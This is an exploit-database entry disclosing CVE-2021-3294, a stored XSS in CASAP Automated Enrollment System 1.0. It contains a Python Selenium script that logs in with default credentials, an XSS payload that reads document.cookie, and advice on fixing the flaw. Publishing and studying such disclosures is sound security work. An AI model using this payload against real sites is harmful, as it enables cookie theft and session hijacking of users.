## https://sploitus.com/exploit?id=PACKETSTORM:161421
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS  
# Author: nu11secur1ty  
# Date: 02.15.2021  
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html  
# Software Author: https://www.sourcecodester.com/users/yna-ecole  
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip  
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code  
# CVE: CVE-2021-3294  
  
  
[+] Credits: (@ nu11secur1ty)  
[+] Website: https://www.nu11secur1ty.com/  
[+] Source:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294  
  
[Exploit Program Code]  
#!/usr/bin/python3  
# author @nu11secur1ty  
# For CVE-2021-3294  
  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
import time  
import os  
  
  
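# Proof-of-concept helper for CVE-2021-3294 (stored XSS in the 'First Name'
# field of CASAP Automated Enrollment System 1.0).  It automates only the
# login step and then prints the test string; the string itself is entered
# by hand in the Users section.
#
# Reviewer notes:
#   * The script logs in before the test string is used, so the affected
#     form appears to sit behind authentication -- confirm against the app.
#   * The test string reads document.cookie.  A session cookie marked
#     HttpOnly is not visible to it, and HTML-encoding the stored value on
#     output (e.g. htmlspecialchars() in PHP) stops the markup from
#     executing at all.

# Login page of the instance under test (points at localhost).
website_link = "http://localhost/Final/index.php"

# Login username and password for that instance.
username = "yna.ecole"
password = "12345"

# "name" attributes of the username field, password field and submit button.
element_for_username = "username"
element_for_password = "password"
element_for_submit = "login"

# Pick exactly one WebDriver; Chrome is the active choice.
# browser = webdriver.Safari()   # macOS users
browser = webdriver.Chrome()     # Chrome users (via chromedriver)
# browser = webdriver.Firefox()  # Firefox users

browser.get(website_link)

try:
    # find_element(By.NAME, ...) replaces the find_element_by_name helpers,
    # which were removed in Selenium 4.3; it also works on Selenium 3.
    username_element = browser.find_element(By.NAME, element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element(By.NAME, element_for_password)
    password_element.send_keys(password)
    sign_in_button = browser.find_element(By.NAME, element_for_submit)
    sign_in_button.click()
except Exception as err:
    # Most likely a form element was not found on the page, but any
    # WebDriver failure lands here, so report what was actually raised.
    print("Some error occured :(")
    print(f"Details: {err!r}")
else:
    # Printed only after the login steps ran without raising.  The browser
    # session is left open (no browser.quit()) for the manual step.
    exploit = "nu11<script>alert(document.cookie)</script>"
    print("If everything is ok, please paste this in to the Users in section in First Name\n")
    print(exploit)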
  
[Vendor]  
https://www.sourcecodester.com/users/yna-ecole  
  
  
[Vulnerability Type]  
XSS  
  
[CVE Reference]  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294  
  
[Security Issue]  
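CASAP Automated Enrollment System 1.0 is affected by stored cross-site scripting  
(XSS) in users.php: markup entered in the 'First Name' field is saved and later rendered as HTML.  
An attacker can use this to steal a user's cookie and to redirect the user to a malicious  
website.  
The fix is to HTML-encode the stored value on output (for example with PHP's htmlspecialchars()); marking the session cookie HttpOnly keeps it out of reach of document.cookie.  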
  
  
[Video]  
https://www.youtube.com/watch?v=_nhIZyJ8rxM  
  
  
@nu11secur1ty  
https://www.nu11secur1ty.com/